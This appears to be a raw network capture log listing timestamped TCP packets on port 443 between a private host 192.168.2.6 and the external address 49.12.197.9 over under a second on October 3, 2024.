                                                                                                                                                      Oct 3, 2024 09:16:17.894299030 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.894319057 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.894397974 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.894424915 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.894468069 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.912591934 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.912615061 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.912754059 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.912796974 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.912852049 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.928327084 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.928353071 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.928478003 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.928492069 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.928544998 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.936439037 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.936455965 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.936568975 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.936584949 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.936631918 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.946223021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.946248055 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.946352959 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.946368933 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.946413994 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.959821939 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.959841967 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.959938049 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.959954023 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.960169077 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.964020967 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.964036942 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.964099884 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.964114904 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.964149952 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.971620083 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.971641064 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.971736908 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.971765995 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.971811056 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.981592894 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.981616974 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.981734037 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.981775999 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.981822968 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.999159098 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.999183893 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.999242067 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.999272108 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:17.999300003 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:17.999317884 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.016325951 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.016361952 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.016490936 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.016535044 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.016582966 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.023813009 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.023837090 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.023969889 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.024012089 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.024060965 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.033549070 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.033575058 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.033679008 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.033724070 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.033771992 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.046669006 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.046691895 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.046796083 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.046825886 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.046873093 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.050837040 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.050858021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.050935030 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.050954103 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.051001072 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.058305979 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.058330059 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.058393955 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.058412075 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.058451891 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.068705082 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.068725109 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.068820000 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.068837881 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.068883896 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.086031914 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.086062908 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.086246014 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.086266041 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.086318016 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.102679968 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.102705956 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.102838993 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.102885962 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.102936983 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.110881090 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.110908031 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.111032009 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.111071110 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.111119986 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.120524883 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.120558023 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.120667934 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.120712042 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.120762110 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.133569002 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.133599997 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.133708954 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.133738041 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.133790970 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.144495964 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.144525051 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.144625902 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.144643068 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.144702911 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.145728111 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.145747900 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.145951986 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.145965099 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.146023989 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.155580044 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.155611038 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.155711889 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.155734062 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.155782938 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.173043966 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.173068047 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.173197985 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.173216105 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.173255920 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.191632032 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.191658974 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.191833019 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.191857100 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.191906929 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.198956966 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.198973894 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.199136972 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.199157953 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.199209929 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.214554071 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.214581013 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.214766026 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.214781046 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.214831114 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.233799934 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.233841896 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.234010935 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.234021902 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.234071016 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.246119022 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.246148109 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.246262074 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.246273041 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.246319056 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.247174025 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.247194052 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.247251987 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.247260094 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.247303009 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.254736900 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.254774094 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.254883051 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.254893064 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.254940987 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.267365932 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.267401934 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.267493963 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.267503023 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.267548084 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.282265902 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.282294035 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.282407045 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.282417059 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.282461882 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.289680004 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.289705992 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.289812088 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.289824963 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.289872885 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.304114103 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.304141045 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.304208040 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.304217100 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.304234982 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.304264069 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.322453022 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.322516918 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.322559118 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.322581053 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.322597980 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.322623968 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.332917929 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.333008051 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.333031893 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.333045006 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.333061934 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.333086014 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.334331036 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.334388971 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.334424973 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.334434032 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.334461927 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.334480047 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.341772079 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.341830015 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.341850042 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.341860056 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.341882944 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.341902018 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.354878902 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.354902029 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.354968071 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.355011940 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.355027914 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.355170012 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.367533922 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.367614985 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.367650032 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.367682934 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.367706060 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.367732048 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.386914015 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.386940002 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.387101889 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.387121916 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.387171030 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.392000914 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.392050982 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.392096996 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.392107964 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.392134905 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.392154932 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.410888910 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.410907984 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.411060095 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.411083937 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.411133051 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.420252085 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.420270920 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.420361996 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.420378923 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.420422077 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.424134016 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.424154997 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.424258947 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.424271107 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.424313068 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.430701971 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.430721045 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.430818081 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.430831909 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.430876017 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.441915035 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.441935062 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.442047119 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.442063093 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.442123890 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.455312967 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.455332994 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.455477953 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.455497980 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.455545902 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.474104881 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.474126101 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.474255085 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.474278927 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.474329948 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.484684944 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.484703064 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.484791994 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.484806061 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.484850883 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.497716904 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.497736931 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.497850895 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.497873068 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.497916937 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.507996082 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.508013010 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.508121967 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.508137941 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.508182049 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.509247065 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.509269953 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.509330034 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.509336948 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.509376049 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.517431021 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.517447948 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.517564058 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.517575026 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.517961025 CEST49727443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:18.541902065 CEST4434972749.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:18.541923046 CEST4434972749.12.197.9192.168.2.6
